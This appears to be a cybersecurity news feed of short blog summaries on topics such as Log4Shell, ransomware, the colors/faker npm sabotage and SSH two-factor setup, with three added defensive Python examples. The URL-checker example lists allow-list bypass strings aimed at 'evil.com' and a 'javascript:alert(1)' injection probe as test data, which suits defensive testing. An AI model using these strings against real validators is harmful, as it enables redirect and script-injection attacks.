Business security is often associated with larger companies where employees spend most of their time in front of computers. This stereotype can lead small business owners – especially ones outside the tech industry – to think they’ll never be targeted by hackers and don’t need to invest in security. It’s a mistake that cybercriminals are exploiting.

Manage Clinical Trial Site Submissions with Egnyte

The volume, variety, and velocity of data being collected in clinical trials is constantly increasing. It regularly surpasses what any one person or even a team of people can process, organize and monitor. Companies can no longer throw people at the problem, which is why many have turned to automation and AI to fill the gap.

Investigate Log4Shell exploits with Elastic Security and Observability

Following the discovery of Log4Shell, a vulnerability in Log4J2, Elastic released a blog post describing how users of our platform can leverage Elastic Security to help defend their networks. We also released an advisory detailing how Elastic products and users are impacted.

Cybersecurity: What to Expect in 2022

As the pandemic continues, organizations around the world are working hard to adapt to the “new normal.” This article highlights the key trends that we will face in 2022 and beyond. Ransomware attacks more than doubled in 2021 compared to 2020, with healthcare and utilities the most commonly targeted sectors. Moreover, attacks are getting more expensive, with the average ransomware payment leaping from US$312,000 in 2020 to $570,000 in 2021.

Monitoring your AWS environment for vulnerabilities and threat detection

Managing the security of your Amazon Web Services (AWS) environment requires constant vigilance. Your strategy should include identifying potential threats to your environment and proactively monitoring for vulnerabilities and system weaknesses that malicious actors might exploit. In a complex environment—such as your AWS account with a multitude of services, coupled with various architectures and applications—the ideal solution should be both comprehensive and straightforward.

Proxy Servers vs. VPNs: What's the Difference?

Both proxy servers and VPNs hide your IP address, allowing you to access websites anonymously, but only VPNs direct all network traffic through an encrypted tunnel. Another key difference is that VPNs address all network data while proxy servers only operate at the application level. The differences between the two solutions can be summarized as follows: Before diving into their technical differences, it's important to first solidify your understanding of proxy servers and VPNs.

Enterprise Risk Management for Cloud Computing

Businesses have always had to manage risk – everything from operational, financial, or strategic risks; to other risks that are reputational, regulatory, or cybersecurity-related. So how does enterprise risk management (ERM) work today, when so many businesses are moving so much of their operations into the cloud? How can CISOs and other senior executives take traditional ERM principles and apply them to the cloud-based technology that underpins so much of the modern enterprise?

Key Elements of a Strong Risk Culture

Risk culture is the set of shared beliefs, attitudes, and understanding among a group, usually in a corporate environment, about risk and risk management practices. A company has a strong risk culture when all employees understand the business and regulatory landscape in which the organization functions, and what risks are acceptable within that landscape to achieve business objectives.

5 bad business results from invalid traffic

Bots are rampant across the web – in fact, around 50% of all web traffic is automated or invalid, i.e., doesn’t come from a real user with genuine interest. While some of this traffic is good and useful, for example, search engine crawlers and content aggregators, a high percentage is malicious. Hosting bad bots on your server can result in a plethora of problems for your website and business, from damage to your brand reputation to excessive financial and technical costs.

How to Outplay the Ransomware Playbook

Organizations across industries are increasingly concerned about their cybersecurity posture and overall ransomware preparedness – and rightfully so – with the 64% increase in attacks from 2019 to 2020 (304 million attacks worldwide in 2020). We have also seen a 2x increase in demand for ransomware preparedness assessments and exercises.

Procore + Egnyte | Optimizing Efficiency With An Integrated Solution

In this video, Procore’s Senior Director of Business Development, Kris Lengieza, discusses how mutual Egnyte and Procore customers can use the integrated software solution to work more efficiently. Integrated software solutions are critical to improved productivity, particularly for the construction industry. The increasing number of tools used per project makes a non-integrated environment very costly and time-consuming due to double entry, plus the need to jump between applications.

2022 Cybersecurity Predictions

Moving into 2022 and looking back at a plentiful year for security in 2021, we at the Cyberint Research Team will try to shed some light on the upcoming year: the key security risks and threats, and what we feel will change. We will focus on the actions required to be as vigilant and protected as possible.

Is fighting cybercrime a losing battle for today's CISO?

At times, the quest to stay on top of web application security can seem futile. It seems as though the adversaries are always a step ahead, and all we can do is try our best to contain the breaches. In this blog, we’ll look at the root causes of concern for today's CISO and share some practical strategies to deter cybercriminals.

How to Address Cultural Change When Implementing a Cybersecurity Program

Cybersecurity is more important than ever before, with the number of corporate breaches increasing dramatically since 2020. In response to recent spikes in threats, many companies are working to create a more cybersecurity-focused employee base. The most effective way to do this is through a top-down, widespread shift in company culture, which places security among the top values.

Abusing Microsoft Office Using Malicious Web Archive Files

In November of 2021, we described several techniques used by attackers to deliver malware through infected Microsoft Office files. In addition to exploits like CVE-2021-40444, these infected documents frequently abuse VBA (Visual Basic for Applications) to execute their techniques, regardless of the final payload. Attackers also often use extra layers of protection to evade signature-based detections, like constructing PowerShell scripts and WMI namespaces at runtime, as done by Emotet.

Event: Bridging the data security and privacy gap

Security and privacy are inherently linked, yet decisions about each are often made in silos. It can be a challenge for teams of all sizes, with varied specialities, to connect the two domains. With that in mind, we’re pleased to announce our first live panel event: How do you bridge the gap between data security and privacy?

Malicious modifications to open source projects affecting thousands - Sysdig Secure

In the early days of 2022, two extremely popular JavaScript open source packages, colors.js, and faker.js, were modified to the point of being unusable. The reason for this event can be traced to various motivations, but what is worth mentioning is that several applications that employed those dependencies were involved. The two impacted packages can be used for different purposes in JavaScript applications. colors.js enables color and style customization in the node.js console.

New Year's resolution: Don't show my security tokens when hacking my demo application on stage

Traditionally, we start the new year with resolutions. We want to do more good things, like working; other things we try to eliminate. Considering the latter, my 2022 resolution is to stop accidentally exposing confidential information while I hack my application during demos on stage or similar. Yes, this New Year's resolution sounds very specific, and it has an excellent security horror story behind it…

Why Financial Services Companies That Value Agility & Security Pick Teleport

2022 feels a little different, doesn’t it? Every day I’m prepared to hear something new, something scary, or something exciting. These last couple of years have made it seem like we just never know what is coming next. It’s no different for financial services companies who have to be prepared for the unexpected, including disruptive technologies that can challenge their core businesses.

How to Improve Your Vendor Due Diligence Process (with Security Ratings)

You can't do business without your vendors. They support critical elements of your organization, from cloud storage services to payment processing to physical items like office supplies or physical components. Your vendors make your organization run more efficiently – but sometimes at a risk to your financial, reputational and operational resiliency.

Building Resilience to Financial Crime: the Convergence of Cyber Intelligence, AML, and Fraud Prevention

The idea of converging cyber intelligence, AML, and fraud prevention activities to eliminate the gaps between these silos of financial crime risk management has been discussed for years. However, recent developments in global real-time payments, open banking, and booming digital transactions have escalated the need for this convergence. In this era of instant payments and CNP transactions, traditional siloed approaches to financial crime prevention are losing their effectiveness.

Data Loss Prevention (DLP) on Jira and Confluence Data Center & Server Editions

Jira and Confluence house high volumes of customer information, tickets, notes, wiki articles, and more. To scan Jira and Confluence Data Center or Server editions, you can use Nightfall’s APIs to scan data at-rest in these silos. In this article, we’ll walk through how you can run a full historical scan on your Jira and Confluence data to discover sensitive data, like API keys and PII. The output will be a report detailing the sensitive findings discovered in your environment.

The 5 Stages of a Credential Stuffing Attack

Many of us are fond of collecting things, but not everyone is excited about Collections #1-5. In 2019, these Collections, composed of ca. 932 GB of data containing billions of email addresses and their passwords, made their way around the Internet. These collections weren’t breaches but compilations of emails and passwords that had been gathered. Even after repeat entries were whittled down, the collection still contained billions of distinct address and password combinations.

Confidence In Action: Investment Bank Uses Forward Networks To Verify Automation Software

Several years ago, a global investment bank embarked on an ambitious plan to automate its network configuration deployment process and use internal teams to run all aspects of network operations. The move was made, in part, because of the fluidity of the bank's network, which is constantly undergoing configuration changes.

What You Should Know About npm Packages 'colors' and 'faker'

On January 8, 2022, the open source maintainer of the wildly popular npm package colors, published colors@1.4.1 and colors@1.4.44-liberty-2 in which they intentionally introduced an offending commit that adds an infinite loop to the source code. The infinite loop is triggered and executed immediately upon initialization of the package’s source code, and would result in a Denial of Service (DoS) to any Node.js server using it.

Endpoint Enigma | Is 2022 the Beginning of the End of On-Prem Security?

Nearly two years after we were forced to experiment with remote work, 2022 will be an inflection point for both threats and cybersecurity solutions. Tune into our annual predictions episode to hear what Lookout CTO of SASE Products Sundaram Lakshmanan thinks will happen next year. We'll be discussing everything from software supply chains to threat hunting and data protection.

Endpoint Enigma | Let's Get Real About Zero Trust: How To Assess Your Security Posture

While most of us understand Zero Trust conceptually, the path to Zero Trust is a complex and constantly evolving journey. In this episode, host Hank Schless is joined by Andy Olpin, Solutions Engineer at Lookout to scale back all the marketing noise surrounding the term and discuss how organizations can pragmatically get started with Zero Trust.

Search History

Easily access your search history to quickly find the Egnyte content you’ve looked for previously. Whether your past search took place on the Web UI, desktop, or mobile, Egnyte remembers past queries and search filters. You’ll be able to quickly review old searches, adjust any previously added filters, and track down the content you need. Locate your files and folders effortlessly using Egnyte’s search history!

What Is FIM (File Integrity Monitoring)?

Change is prolific in organizations’ IT environments. Hardware assets change. Software programs change. Configuration states change. Some of these modifications are authorized insofar as they occur during an organization’s regular patching cycle, while others cause concern by popping up unexpectedly. Organizations commonly respond to this dynamism by investing in asset discovery and secure configuration management (SCM).

Understanding LSA Protection

Securing your Windows servers and Windows 10 machines is vital, especially given today’s sophisticated threat landscape. These are usually the first machines to be compromised in an attack through exploitation of the weakest link in the chain — the user. Through trickery and social engineering, threat actors gain access to these machines and then seek to move laterally and elevate their privileges.

Your Data is Everywhere: Here are the Critical Capabilities of a Modern DLP

In some ways, IT teams had a great life in the early 2000s. Data was stored inside data centers and accessed through known ingress and egress points like a castle with a limited number of gates. As a result, organizations had control over exactly whom and what devices could access company data. This is no longer the case. With users accessing cloud applications with whatever networks and devices are at their disposal, those defense mechanisms have become inadequate.

Introducing next-generation firewall from Palo Alto Networks to support 5G-enabled IoT, OT and IT use cases

Enterprises know they need defenses integrated into each aspect of their network while not being an inhibitor to innovation. Digital transformation realized through new 5G-enabled IoT, Operational Technologies (OT) and IT use cases are no exception. Therefore, security teams need to take a closer look at the best technology to support this innovation.

noPac Exploit: Latest Microsoft AD Flaw May Lead to Total Domain Compromise in Seconds

Microsoft recently published two critical CVEs related to Active Directory (CVE-2021-42278 and CVE-2021-42287), which when combined by a malicious actor could lead to privilege escalation with a direct path to a compromised domain. In mid-December 2021, a public exploit that combined these two Microsoft Active Directory design flaws (referred also as “noPac”) was released.

Understanding Insecure Direct Object References (IDOR)

IDOR is a broken access control vulnerability where unvalidated user input can be used to perform unauthorized access to application functions. IDOR can result in sensitive information disclosure, information tampering, etc. This issue was previously part of the OWASP Top 10 2007; it was later merged into the OWASP Top 10 A5 Broken Access Control category.

CrowdStrike Services Offers Incident Response Tracker for the DFIR Community

During a recent client engagement for a tabletop exercise (TTX), it became apparent that the client did not have a methodology for tracking indicators and building an incident timeline. The CrowdStrike Services team wanted to provide more information to our client on how incidents can and should be tracked, but nothing was available in the public domain.

Power the SOC of the Future with the DataLinq Engine - Part 2

In my first blog in this series, we discussed the importance of data to the modern SOC, and the unique approach of ThreatQ DataLinq Engine to connect the dots across all data sources, tools and teams to accelerate detection, investigation and response. We developed the DataLinq Engine with the specific goal of optimizing the process of making sense out of data in order to reduce the unnecessary volume and resulting burden.

CISOs: Why the Rezilion - Tenable Integration is a Game Changer for Product Security and Devops

As the frequency of new product releases rises and as the attack surface keeps growing, most companies are faced with a common problem – a growing vulnerability workload. Their vulnerability scanners report countless vulnerabilities and there are simply not enough resources or time to fix all of them, leaving their networks vulnerable and exploitable.

What You Need to Know About Adding a SaaS Component to Your Hardware or Software Business

Many market-leading companies who have dominated their respective sectors with hardware or on-prem/installable software solutions are turning to SaaS offerings to fuel the next phase of their growth. Why? Simple. Market valuations are much higher for SaaS companies than they are for traditional software and hardware companies. The median multiple on earnings for a SaaS company is 12.7x as of Q3 2021 according to venture capitalist Jamin Ball who tracks the Public Cloud Software (e.g.

Building Out SaaS Incident Response Capabilities

Every functioning security team has an incident response plan. Advance strategizing and preparation are absolutely imperative to ensure a quick response to data breaches, ransomware, and numerous other challenges, but most companies first developed that plan years, if not decades, ago and now only revisit it periodically. This is a problem. How many organizations have developed a separate incident response plan to address the unique risks of the software-as-a-service (SaaS) era? Far too few.

Netskope Threat Coverage: Night Sky

A new ransomware family calling itself Night Sky was spotted on the first day of 2022 by MalwareHunterTeam. The group appears to operate under the RaaS (Ransomware-as-a-Service) model, like REvil, LockBit and Hive, and publishes data exfiltrated during the attack on a deep web site if the victim does not pay the ransom. At the time of writing, two companies are listed on that site, where the group has published the victims' allegedly stolen data.

Laptop running slow? You might have been cryptojacked.

It’s always frustrating when your laptop starts to slow down. The more you click, the more it seems to stutter and have a good think about everything you ask it to do. Joining video calls and even opening documents becomes a chore. Normally, this is a sign to free up some storage space or request a new device/component from the IT department. However, an unusually slow laptop can also be the sign of something more sinister – cryptojacking.

Devo's 2022 Cybersecurity Predictions: Part Three

In part two of our 2022 cybersecurity predictions series, Devo Security Engineering Director Sebastien Tricaud explained Web3 and new security testing trends. While cybersecurity tools and approaches are certainly evolving quickly, so are cybercriminals. Here are my insights on cyberthreats and attacks we should expect to see more of this year.

Technical Advisory: Zero-day vulnerability in Apache Log4j Library Allows Remote Code Execution

On December 9th, 2021, Apache disclosed CVE-2021-44228 (colloquially referred to as Log4Shell), a remote code execution vulnerability in the Apache Log4j library, a Java-based logging tool widely used in applications around the world. The vulnerability was assigned the highest possible CVSS severity score of 10.0.

How To Manage The Hidden Impacts of Data Leak With Cloud DLP

Data leaks are a type of data loss threat that often fly under the radar — making them potentially more damaging than a malware or ransomware attack. Compared to data breaches, data leaks put customer information at risk accidentally. Data leaks can lead to credit card fraud, extortion, stolen IP, and further attacks by cybercriminals who seek to take advantage of security misconfigurations.

How to Map SOC Analyst Skills With Experience Level

Security operations centers (SOCs) exist to deliver sustained monitoring and response capabilities. Staff members are a core pillar of this mission. Each SOC should have clearly articulated roles and levels for its personnel. This helps to establish fair practices for hiring, training, promotion, compensation and performance expectations.

What Oil and Gas Companies Must Do to Counter Cyber Threats

The oil and gas industry’s global supply chain uses a vast array of information technology (IT) and operational technology (OT) systems. These systems require constant cybersecurity protection to ensure energy flows efficiently and productively around the world to meet global needs. Hackers know that IT and OT systems are often interdependent and closely linked. In fact, the recent Colonial Pipeline attack resulted from the successful breach of Colonial’s IT network.

TellYouThePass Ransomware Analysis Reveals a Modern Reinterpretation Using Golang

The TellYouThePass ransomware family was recently reported as a post-exploitation malicious payload used in conjunction with a remote code execution vulnerability in Apache Log4j library, dubbed Log4Shell. TellYouThePass was first reported in early 2019 as a financially motivated ransomware designed to encrypt files and demand payment for restoring them. Targeting both Windows and Linux systems, TellYouThePass ransomware re-emerged in mid-December 2021 along with other ransomware like Khonsari.

FIN7 Sends BadUSB Devices to U.S. Businesses as Part of Targeted Ransomware Campaign

First reported by The Record, the FBI has issued a new security Flash Alert warning organizations that the cybercrime gang FIN7 is again sending malicious USB drives to U.S. business targets in the transportation, insurance and defense industries through the U.S. Postal Service and United Parcel Service. This latest wave of attacks began in August 2021 with FIN7, which is also known as Carbanak Group and Navigator Group. The drives can be recognized by the LilyGo label on the case.

Random but Memorable - Episode 8.6: Games Revival Outtake Special

Is there a better way to ring in the New Year than with the revival of all Random but Memorable's iconic games? What the Phrase, Real or Not Real, Play Your Passwords Right, Three Word Password, Ridiculous Requirements – whichever's your favourite, the gang's all here! Not only that, we've also included some bonus, long-requested outtakes (with the help of a trusty soundboard!) Listen to the chaos unfold as we uncover some lost gems from the show. (Some of which probably should have stayed lost...)

Nuvias UC Fuels Its Growth In Europe Through Alliance Technologies GmbH Acquisition

As part of its exciting and fast-paced growth, driven by increased demand from its customer base to provide best of breed solutions across Europe, Nuvias UC announces the acquisition of Alliance Technologies GmbH, a UC specialised, value added distributor founded in 2001.

Multi-Factor is incomplete without backup codes

I was logging into one of my favorite online shopping sites the other day, and, as with all my other sites, I was presented with the multi-factor authentication prompt to complete the login process. Anyone who knows me, knows that I have been a long-time supporter of multi-factor, or 2-step verification of any kind.

Code Dx wins CybersecAsia award for Best in Application Development Security

Code Dx was recognized for its leadership in application security development. Learn how Code Dx helps to build trust in your software. Synopsys is proud to announce that Code Dx® has won the 2021 CybersecAsia Reader’s Choice Award for Best in Application Development Security.

URL confusion vulnerabilities in the wild: Exploring parser inconsistencies

URLs have forever changed the way we interact with computers. Conceptualized in 1992 and defined in 1994, the Uniform Resource Locator (URL) continues to be a critical component of the internet, allowing people to navigate the web via descriptive, human-understandable addresses. But with the need for human readability came the need for breaking them into machine-usable components; this is handled with URL parsers.
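An added example, not code from the original post, of the consequence of those parser inconsistencies: an allow-list check is only as good as the parser it uses, and the same string can name one host to the checker and another to the component that eventually fetches it. The allow-listed host and the sample URLs are constructed; the comments note how a WHATWG-style (browser or Node) parser reads each string.

```python
"""Host allow-listing versus URL parser disagreement.

Added example, not from the original post. ALLOWED_HOST and the sample
URLs are constructed. Python's urllib.parse is the 'checker' here; the
comments say what a WHATWG (browser) parser makes of the same bytes.
"""
from urllib.parse import urlsplit

ALLOWED_HOST = "good.com"


def naive_check(url: str) -> bool:
    """Substring check: passes as long as the allowed host appears somewhere."""
    return ALLOWED_HOST in url


def parsed_check(url: str) -> bool:
    """Checks the host as urllib.parse sees it (lower-cased, userinfo stripped)."""
    return urlsplit(url).hostname == ALLOWED_HOST


def strict_check(url: str) -> bool:
    """Instead of trusting one parser's opinion, refuse the constructions
    that parsers are known to disagree on: only http(s), no userinfo, no
    backslashes or whitespace, and an exact lower-cased host match."""
    if any(ch in url for ch in "\\ \t\r\n"):
        return False
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    if parts.username is not None or parts.password is not None:
        return False
    return parts.hostname == ALLOWED_HOST


def compare(url: str) -> tuple:
    """Returns (naive, parsed, strict) verdicts for one URL."""
    return naive_check(url), parsed_check(url), strict_check(url)


if __name__ == "__main__":
    samples = [
        # plain allowed URL: everyone agrees
        "http://good.com/report",
        # userinfo trick: the real host is evil.com for every parser
        "http://good.com@evil.com/",
        # backslash trick: urllib keeps it inside the authority and sees
        # good.com, while a WHATWG parser treats '\' as '/' for http and
        # sees evil.com with path /@good.com/ -- the checker and the
        # fetcher disagree, which is the bypass
        "http://evil.com\\@good.com/",
        # scheme confusion: no host at all, but the substring is present
        "javascript:alert(1)//good.com",
    ]
    for url in samples:
        print(f"{url!r:40} naive/parsed/strict = {compare(url)}")
```

The strict variant is deliberately blunt: rejecting backslashes and userinfo outright costs nothing for legitimate traffic and removes the cases where the checker's parser and the consumer's parser can be made to disagree.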

SCA Should Be in Your Toolbox to Address Supply Chain Risk

Software composition analysis (SCA) tools provide automated visibility throughout the software development life cycle (SDLC) for more efficient risk management, security, and license compliance. As organizations accelerate their digital initiatives, they rely on development teams both internally and externally to build the applications that will help them move forward. But applications are also a popular target for criminals.

Getting Vulnerability Management Right in Healthcare

In this second of a five-part series of posts on why strong vulnerability management is so vital for cybersecurity programs, we look at the need for effective vulnerability management in the healthcare sector. Like financial services, healthcare is a highly-regulated industry and it’s also among the most common targets of cybercriminals.

What is a Distributed Cloud Architecture? Top 4 Security Considerations

By 2025, there will be more than 100 zettabytes of data stored in the cloud – that’s a lot of data! With more applications needing to process a significant amount of data in real-time, there is a shift in demand for distributed cloud and edge computing. Fortunately, the distributed cloud brings many impressive benefits to organizations – generating immense cost savings, greater scalability, and reaching resource-intensive business demands.

How to source the right tools to scale an AppSec programme

Everyone’s development process is different, so it stands to reason that everyone’s ideal security toolkit will be different too. But finding the right tools for your project, and getting the most out of them, shouldn’t have to be a headache. In the field of application security there are literally thousands of tools to choose from that may help the development, security and longevity of your projects.

Why marketers can't ignore bot traffic on their sites in 2022

As a thorn in the side of marketing teams of all sizes, awareness of ad fraud has grown in recent years due to the sheer amount of money it can cost advertisers. In one famous case, Uber discovered fraudulent app installs attributed to its ads had cost the company $100 million. But it’s not just overtly malicious activity like ad fraud that marketing budget-setters need to be concerned about. Marketers must be aware of the potential damage bots of all kinds can do, intentionally or otherwise.

Detecting Malware Script Loaders using Remcos: Threat Research Release December 2021

Nowadays, malware typically goes through several stages before it fully compromises the targeted host. The best-known initial stage is the phishing email carrying a malicious macro or a malicious link, which downloads either the actual loader or the next stage that in turn fetches the final payload.

Understanding Monetary Authority of Singapore's (MAS) Guidance: Safeguarding Your Financial Institution's Cloud Environment

As a major financial hub in Asia and globally, Singapore is very aware of the challenges facing the financial industry, especially the accelerated digital transformation that stemmed from the COVID-19 pandemic. In response to the sector’s increased exposure to cloud technology, the Monetary Authority of Singapore (MAS) has released a guideline to address cybersecurity risks associated with the adoption of public clouds.

What SecOps Teams Can Expect in 2022

Traditionally, most organizations have had siloed departments wherein teams’ activities are highly separated and the objectives within organizational structures are divided. This operational methodology has brought about friction – especially within the IT department, where developers and ITOps lack collaboration.

Don't Let Supply Chain Attacks Get the Best of You

The past two years have brought about significant disruptions to global supply chains. Recent headlines have focused on labor shortages and their impact on everything from product production to shipping delays. However, another, more significant supply chain issue should be top of mind for every organization: supply chain attacks.

Hello CISO - Episode 1 (Part 2): The Downfall of On-Premise Security

In the beginning, there was on-premise. Then things got complicated. Hello CISO is a new series aimed at Chief Information Security Officers, IT security teams, and all other members of an organization responsible for maintaining the safety and integrity of the business and its operations. "The responsibilities of the modern CISO are expanding as digital infrastructure grows more complex. It’s no longer feasible to protect against every single threat, so you have to think more strategically. We need to work smarter, not harder – and that’s what I want to explore in this series."

Offline Access on a Mobile Device

The Egnyte Mobile App gives you access to content from your smartphone or tablet. For those times you find yourself without an internet connection, you can still easily get to content you’ve marked for offline access. From the ellipsis menu, simply select Mark Offline to keep a copy of the file locally on your device. Your offline content can be found under the offline tab, where you can update your local copies to ensure you have the latest versions, and remove them to free up space on your device.

Table Calculations

Use table calculations to roll up Total/Percentages into a single value for summary visualizations. Netskope, the SASE leader, safely and quickly connects users directly to the internet, any application, and their infrastructure from any device, on or off the network. With CASB, SWG, and ZTNA built natively in a single platform, Netskope is fast everywhere, data-centric, and cloud smart, all while enabling good digital citizenship and providing a lower total-cost-of-ownership.

Digital-First SecOps: A CISO Perspective

Businesses of all types, and across all verticals, have gone digital-first. This shift enables many benefits, such as greater scalability and speed. But it also amplifies the security and compliance challenges that arise from digital systems. For CISOs, this shift amplifies the need to apply the same level of automation, speed, and business-wide accessibility for security that digitization has brought to other aspects of the business. In short, modern businesses need to adopt a digital-first approach to SecOps itself.

How Will ISO 27701 and the GDPR Affect Your Organization?

Companies today face increasing pressure to implement strong cybersecurity controls. While the U.S. has no comprehensive cybersecurity law, many organizations still fall under state, international, or industry regulations. Two of the most prominent controlling publications are the General Data Protection Regulation (GDPR), and the ISO 27701 standard. One has the force of law, and the other is a guiding framework, respectively. Both of these documents apply to an increasing number of businesses.

Can We Lighten the Cybersecurity Load for Heavy Industries?

One of the biggest problems with the IT / OT convergence in critical infrastructure is that much of the legacy hardware cannot simply be patched to an acceptable compliance level. Recently, Sean Tufts, the practice director for Industrial Control Systems (ICS) and Internet of Things (IoT) security at Optiv, offered his perspectives on where the industry has been, where it is going, and some of the progress being made to secure critical infrastructure.

Open source maintainer pulls the plug on npm packages colors and faker, now what?

On January 8, 2022, the open source maintainer of the wildly popular npm package colors, published colors@1.4.1 and colors@1.4.44-liberty-2 in which they intentionally introduced an offending commit that adds an infinite loop to the source code. The infinite loop is triggered and executed immediately upon initialization of the package’s source code, and would result in a Denial of Service (DoS) to any Node.js server using it.
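For a team that needs to know whether the sabotaged releases made it into a build, here is an added example, not code from the original post or from the affected projects: a scanner that walks an npm package-lock.json and flags the bad versions, handling both the flat lockfileVersion 2/3 layout and the nested lockfileVersion 1 layout. The colors versions are the ones named above; the faker version is taken from the public advisory for the same incident, not from this page. The lockfile contents are constructed.

```python
"""Find sabotaged colors/faker releases in an npm lockfile.

Added example, not from the original post. KNOWN_BAD lists the two colors
versions named in the post; faker 6.6.6 comes from the public advisory for
the same incident. SAMPLE_LOCK_V2 and SAMPLE_LOCK_V1 are constructed.
"""
import json

KNOWN_BAD = {
    "colors": {"1.4.1", "1.4.44-liberty-2"},
    "faker": {"6.6.6"},
}


def _walk_v1(deps: dict, path: str, hits: list) -> None:
    """lockfileVersion 1 nests transitive deps under each package's
    'dependencies' key, so recurse and keep the chain for the report."""
    for name, meta in deps.items():
        version = meta.get("version")
        if version in KNOWN_BAD.get(name, set()):
            hits.append((f"{path}{name}", version))
        _walk_v1(meta.get("dependencies", {}), f"{path}{name} > ", hits)


def find_sabotaged(lock_text: str) -> list:
    """Returns [(install path or dependency chain, version), ...]."""
    lock = json.loads(lock_text)
    hits: list = []
    if "packages" in lock:
        # lockfileVersion 2/3: flat map keyed by install path; "" is the root
        for install_path, meta in lock["packages"].items():
            if not install_path:
                continue
            name = install_path.rsplit("node_modules/", 1)[-1]
            if meta.get("version") in KNOWN_BAD.get(name, set()):
                hits.append((install_path, meta["version"]))
    else:
        _walk_v1(lock.get("dependencies", {}), "", hits)
    return hits


# Constructed lockfiles: one clean nested copy, two bad top-level copies
SAMPLE_LOCK_V2 = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 2,
    "packages": {
        "": {"name": "demo-app", "dependencies": {"colors": "^1.4.0"}},
        "node_modules/colors": {"version": "1.4.1"},
        "node_modules/some-cli/node_modules/colors": {"version": "1.4.0"},
        "node_modules/faker": {"version": "6.6.6"},
    },
})

SAMPLE_LOCK_V1 = json.dumps({
    "name": "legacy-app",
    "lockfileVersion": 1,
    "dependencies": {
        "some-cli": {
            "version": "2.0.0",
            "dependencies": {"colors": {"version": "1.4.44-liberty-2"}},
        },
    },
})


if __name__ == "__main__":
    for label, text in (("v2", SAMPLE_LOCK_V2), ("v1", SAMPLE_LOCK_V1)):
        for where, version in find_sabotaged(text):
            print(f"[{label}] {where} is {version}: sabotaged release")
```

A caret range such as `^1.4.0` is exactly what pulled the bad versions in, so the remediation is to pin an exact known-good version (for colors, 1.4.0 was the last release before the sabotage) and to treat the lockfile as the thing that gets reviewed, not the package.json.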

What is Domain Hijacking? Tips to Protect Yourself

Domain hijacking is the act of domain name theft. It can happen to individuals or organisations and it’s increasing in frequency. The name may be hijacked by someone else who passes themselves off as you, tricks your domain registrar into transferring your domain to them, or hacks into your account (sometimes through phishing) and transfers it themselves.

Weekly Cyber Security News 07/01/2022

A selection of this week’s more interesting vulnerability disclosures and cyber security news. For a daily selection see our twitter feed at #ionCube24. What a start to 2022…. I happened to be on Twitter New Year’s Day and spotted a flurry of tweets about MS Exchange. Digging deeper it looks like a lot were firefighting a serious bug.

FTC highlights the importance of securing Log4j and software supply chain

Earlier this week, the FTC issued a warning to companies regarding the Log4j vulnerability. Given the rampant exploitation of the recently discovered vulnerabilities in this ubiquitous open source logging package, it’s encouraging to see the agency take this rare step, beginning to form a firm stance on software supply chain security. Although this increased scrutiny from the FTC may at first seem daunting, violations can be remediated with the right practices.

Interview with CTO Kathleen Moriarty

For the newest instalment in our series of interviews asking leading technology specialists about their achievements in their field, we’ve welcomed Kathleen Moriarty, Chief Technology Officer at the Center for Internet Security. During her tenure in the Dell EMC Office of the CTO, Kathleen had the honour of being appointed and serving two terms as the Internet Engineering Task Force (IETF) Security Area Director and as a member of the Internet Engineering Steering Group from March 2014-2018.

Clearing Security Hurdles Faster to Drive Business Forward in 2022

As organizations look to take their 2022 security concerns head-on, they need to create resilient cybersecurity programs that help them make smarter, faster, informed decisions. In our recent webinar, I had the pleasure of chatting with security professionals Mike Wilkes from SecurityScorecard, Scott Fuller from Access Health, and John Beal from St. Charles Health. They discuss the challenges they face and how they plan to mitigate risk across their entire ecosystem in 2022.

How to stay creatively inspired while working from home

Creativity can be fickle. One day, your brain is full of bright ideas you’re keen to jot down, develop, and share with others. The next day, you have nothing. Zilch. Not even a flicker of an idea. You suddenly feel like a world-class restaurant that’s run out of ingredients.

Attack Misuses Google Docs Comments to Spew Out "Massive Wave" of Malicious Links

Security researchers say they have seen a “massive wave” of malicious hackers exploiting the comment feature in Google Docs to spread malicious content into the inboxes of unsuspecting targeted users. According to a blog post published by Avanan, the comments functionality of Google Docs, as well as its fellow Google Workspace web-based applications Google Sheets and Google Slides, is being exploited to send out malicious links.

Why You Need an Adversary-focused Approach to Stop Cloud Breaches

It should come as little surprise that when enterprise and IT leaders turned their attention to the cloud, so did attackers. Unfortunately, the security capabilities of enterprises have not always kept up with the threat landscape. Poor visibility, management challenges and misconfigurations combine with other security and compliance issues to make protecting cloud environments a complex endeavor.

How to Set Up Two-Factor Authentication for SSH

One way to enhance SSH login security is by using two-factor authentication (2FA). This approach forces an administrator to self-identify with an additional security verification in addition to the local admin credentials. This tutorial guides you through setting up Google Authenticator PAM to enable 2FA for users connecting to SSH on a Linux server. We’ll use nano as our editor in examples.
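What the PAM module checks on each login is a TOTP code (RFC 6238), and seeing the verification written out makes the tutorial's settings less mysterious. The following is an added example, not code from the original tutorial or from the Google Authenticator project: HOTP truncation, the 30-second time step, the skew window, and the base32 secret that the setup tool stores. The key used is the RFC 6238 reference-vector key, not a real secret.

```python
"""TOTP (RFC 6238) as verified by a Google Authenticator style PAM module.

Added example, not from the original tutorial. RFC_KEY is the RFC 6238
reference-vector key ("12345678901234567890"), not a real secret.
"""
import base64
import hashlib
import hmac
import struct
import time

STEP = 30      # seconds per time step
DIGITS = 6     # code length shown in the authenticator app
RFC_KEY = b"12345678901234567890"


def hotp(secret: bytes, counter: int, digits: int = DIGITS) -> str:
    """RFC 4226: HMAC-SHA1(secret, counter) -> dynamic truncation -> digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, at: int, step: int = STEP) -> str:
    """The code for the time step containing the Unix time `at`."""
    return hotp(secret, at // step)


def verify(secret: bytes, candidate: str, at: int, window: int = 1) -> bool:
    """Accept the current step and `window` steps either side to tolerate
    clock skew. window=1 is three valid codes at any moment, which is the
    PAM module's default; every extra step widens the brute-force target,
    so pair it with the module's rate limiting. Comparison is constant
    time so a wrong digit does not fail faster than a right one."""
    if not (candidate.isdigit() and len(candidate) == DIGITS):
        return False
    counter = at // STEP
    return any(
        hmac.compare_digest(hotp(secret, counter + delta), candidate)
        for delta in range(-window, window + 1)
    )


def secret_from_base32(text: str) -> bytes:
    """The setup tool writes the shared secret in base32 without padding;
    restore the padding before decoding."""
    text = text.strip().upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


if __name__ == "__main__":
    now = int(time.time())
    print("current code:", totp(RFC_KEY, now))
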